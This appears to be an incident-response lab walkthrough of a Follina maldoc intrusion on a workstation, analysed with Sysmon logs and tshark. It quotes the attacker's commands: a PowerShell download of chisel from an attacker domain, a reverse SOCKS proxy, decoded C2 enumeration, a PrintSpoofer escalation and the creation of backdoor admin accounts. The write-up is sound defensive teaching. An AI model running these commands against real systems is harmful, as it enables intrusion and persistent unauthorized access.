You are tasked to conduct an investigation from a workstation affected by a full attack chain.
CONTEXT
I. Background
In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.
A maldoc was found to be downloaded into the workstation via browser. This was confirmed via logs pertaining to file creation (Sysmon Event ID 11) with its source coming from chrome.exe.
The decoded payload downloads and adds a file, update.zip, to the Startup folder which is then extracted to the same directory. The execution being done in PowerShell as well as having sdiagnhost.exe writing the file to the Startup folder confirms the abuse of the Follina exploit.
Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.
As the file, update.zip, was written in the Startup folder, login activities of the compromised user (benimaru) were monitored and processes spawned by winlogon.exe were traced.
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.
Network traffic related to the execution of first.exe shows requests to the URI path /9ab62b5:
$tshark-rcapture.pcapng-Y"ip.dst==167.71.222.162 and http"|head-n15159227.738875192.168.254.107→167.71.222.162HTTP161GET/9ab62b5HTTP/1.1$tshark-rcapture.pcapng-Y"frame.number==5159"-Tjson|jq-r'.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)' {"http.host":"resolvecyber.xyz","http.request.line":"user-agent: Nim httpclient/1.6.6\r\n","http.connection":"Keep-Alive","http.user_agent":"Nim httpclient/1.6.6","http.request.full_uri":"http://resolvecyber.xyz/9ab62b5","http.request":"1","http.request_number":"1" }
Requests with the GET parameter, ?q=, are also seen with base64 encoded payloads.
$tshark-rcapture.pcapng-Y"ip.dst==167.71.222.162 and http"-Tfields-ehttp.request.uri/9ab62b5/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K/9ab62b5/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K/9ab62b5 [..omitted..]
II. Discovery
Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.
HTTP requests with base64 encoded payloads were parsed and decoded using the following command:
$foriin $(tshark-rcapture.pcapng-Y'(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="'-Tfields-ehttp.request.uri|cut-d'='-f2); do> echo $i |base64-d;>done
The threat actor was then seen to have achieved Remote Code Execution (RCE) with a non-interactive webshell. Initial enumeration included their current user context, existing user directories, as well as local users and administrators:
> whoami tempest\benimaru> pwd Path---- C:\Windows\system32> dir C:\Users Directory: C:\Users Mode LastWriteTime Length Name--------------------------- d-----6/20/20229:06 PM benimaru d-r---6/20/20224:03 PM Public d-----6/20/202211:52 PM rimuru> net users User accounts for \\TEMPEST------------------------------------------------------------------------------- Administrator benimaru DefaultAccount Guest rimuru WDAGUtilityAccount The command completed successfully.> net localgroup administrators - Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members------------------------------------------------------------------------------- Administrator rimuru The command completed successfully.> net user benimaru User name benimaru Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/20/2022 9:18:04 PM Password expires Never Password changeable 6/20/2022 9:18:04 PM Password required No User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/21/2022 1:14:49 AM Logon hours allowed All Local Group Memberships *Remote Management Use*Users Global Group memberships *None The command completed successfully.
Next, they began exploring the current user context's home directory:
> dir C:\Users\benimaru - Directory: C:\Users\benimaru Mode LastWriteTime Length Name--------------------------- d-r---6/20/20224:13 PM 3D Objects d-r---6/20/20224:13 PM Contacts d-r---6/21/202212:27 AM Desktop d-r---6/20/20229:20 PM Documents d-r---6/21/20221:13 AM Downloads d-r---6/20/20224:13 PM Favorites d-r---6/20/20224:13 PM Links d-r---6/20/20224:13 PM Music dar---6/21/20221:15 AM OneDrive d-r---6/20/20224:13 PM Pictures d-r---6/20/20224:13 PM Saved Games d-r---6/20/20224:13 PM Searches d-r---6/20/20225:57 PM Videos> dir C:\Users\benimaru\documents > dir C:\users\benimaru\Desktop - Directory: C:\users\benimaru\Desktop Mode LastWriteTime Length Name----------------------------a----6/20/202211:34 PM 268 automation.ps1-a----6/20/20224:13 PM 1446 Microsoft Edge.lnk> cat C:\Users\Benimaru\Desktop\automation.ps1
A file, automation.ps1, was discovered which includes the user, benimaru's, credentials in plaintext:
$user ="TEMPEST\benimaru"$pass ="infernotempest"$securePassword =ConvertTo-SecureString $pass -AsPlainText -Force;$credential =New-Object System.Management.Automation.PSCredential $user, $securePassword## TODO: Automate easy tasks to hack working hours
Following the user enumeration, network-related information were then gathered:
> netstat -ano -p tcp Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:1350.0.0.0:0 LISTENING 864 TCP 0.0.0.0:4450.0.0.0:0 LISTENING 4 TCP 0.0.0.0:50400.0.0.0:0 LISTENING 5508 TCP 0.0.0.0:53570.0.0.0:0 LISTENING 4 TCP 0.0.0.0:59850.0.0.0:0 LISTENING 4 TCP 0.0.0.0:76800.0.0.0:0 LISTENING 4964 TCP 0.0.0.0:470010.0.0.0:0 LISTENING 4 TCP 0.0.0.0:496640.0.0.0:0 LISTENING 476 TCP 0.0.0.0:496650.0.0.0:0 LISTENING 1212 TCP 0.0.0.0:496660.0.0.0:0 LISTENING 1760 TCP 0.0.0.0:496670.0.0.0:0 LISTENING 2424 TCP 0.0.0.0:496710.0.0.0:0 LISTENING 624 TCP 0.0.0.0:496760.0.0.0:0 LISTENING 608 TCP 192.168.254.107:1390.0.0.0:0 LISTENING 4 TCP 192.168.254.107:5180252.139.250.253:443 ESTABLISHED 3216 TCP 192.168.254.107:5183934.104.35.123:80 TIME_WAIT 0 TCP 192.168.254.107:51858104.101.22.128:80 TIME_WAIT 0 TCP 192.168.254.107:5186020.205.146.149:443 TIME_WAIT 0 TCP 192.168.254.107:51861204.79.197.200:443 ESTABLISHED 4352 TCP 192.168.254.107:5187120.190.144.169:443 TIME_WAIT 0 TCP 192.168.254.107:5187652.178.17.2:443 ESTABLISHED 4388 TCP 192.168.254.107:5187820.60.178.36:443 ESTABLISHED 4388 TCP 192.168.254.107:5188152.109.124.115:443 ESTABLISHED 4388 TCP 192.168.254.107:5188252.139.154.55:443 ESTABLISHED 4388 TCP 192.168.254.107:5188440.119.211.203:443 ESTABLISHED 4388 TCP 192.168.254.107:5189552.152.90.172:443 ESTABLISHED 5508 TCP 192.168.254.107:5189620.44.229.112:443 ESTABLISHED 8904
Finally, the threat actor downloaded chisel (a socks proxy application) into the workstation:
> powershell iwr http://phishteam.xyz/02dcf07/ch.exe-outfile C:\Users\benimaru\Downloads\ch.exe- base64: invalid input> dir C:\Users\benimaru\Downloads\ch.exe- Directory: C:\Users\benimaru\Downloads Mode LastWriteTime Length Name----------------------------a----6/21/20221:17 AM 8230912ch.exe
A reverse socks proxy to 167.71.199.191:8080 was started:
The user, benimaru, belonging to the Remote Management Users group as well as having TCP port 5985 open in his workstation may have given the threat actor remote access via WinRM. The logs below show all Network logons (LogonType 3) of the compromised user:
Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.
Executions were seen in the Sysmon logs but not in the captured network traffic. This leads to the assumption that the threat actor was able to establish a stable shell via WinRM.
The first execution was enumeration of privileges for the current user context (benimaru):
spf.exe was executed (to run final.exe after the fact) and based on the executable's hash was found to be a printspoofer exploit which abuses impersonation privileges (SeImpersonatePrivilege). The threat actor must have been tipped off after enumerating user privileges.
Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.
Callbacks to 167.71.222.162:8080 were parsed and decoded using the following command:
$foriin $(tshark-rcapture.pcapng-Y'(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="'-Tfields-ehttp.request.uri|cut-d'='-f2); >doecho $i |base64-d;>done
Now, the current user context of the threat actor is NT AUTHORITY\SYSTEM which is the local superadmin of the workstation:
> whoami nt authority\system> pwd Path---- C:\Windows\system32> whoami /priv PRIVILEGES INFORMATION---------------------- Privilege Name Description State================================================================================================================== SeCreateTokenPrivilege Create a token object Enabled SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled SeRelabelPrivilege Modify an object label Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
They attempted to add two new users, shuna and shion, but failed without adding the option, /add, to the net user command:
> net user shuna pr1nc3ss!> net user shion m4st3rch3f!> net users User accounts for \\------------------------------------------------------------------------------- Administrator benimaru DefaultAccount Guest rimuru WDAGUtilityAccount The command completed with one or more errors.
This time around, with the correct command, the two users were successfully created:
> net user /add shuna princess
The command completed successfully.
> net user /add shion m4st3rch3f!
The command completed successfully.
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
Another thing the threat actor did for persistence was to change the local administrator's password as well as add the new user, shion, to the localadministrators group:
> net user Administrator ch4ng3dpassword!
The command completed successfully.
> net localgroup administrators /add shion
The command completed successfully.
> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
The logs below confirms the creation of two new users (Event ID 4720) as well the addition of shion to the localadministrators group (Event ID 4732):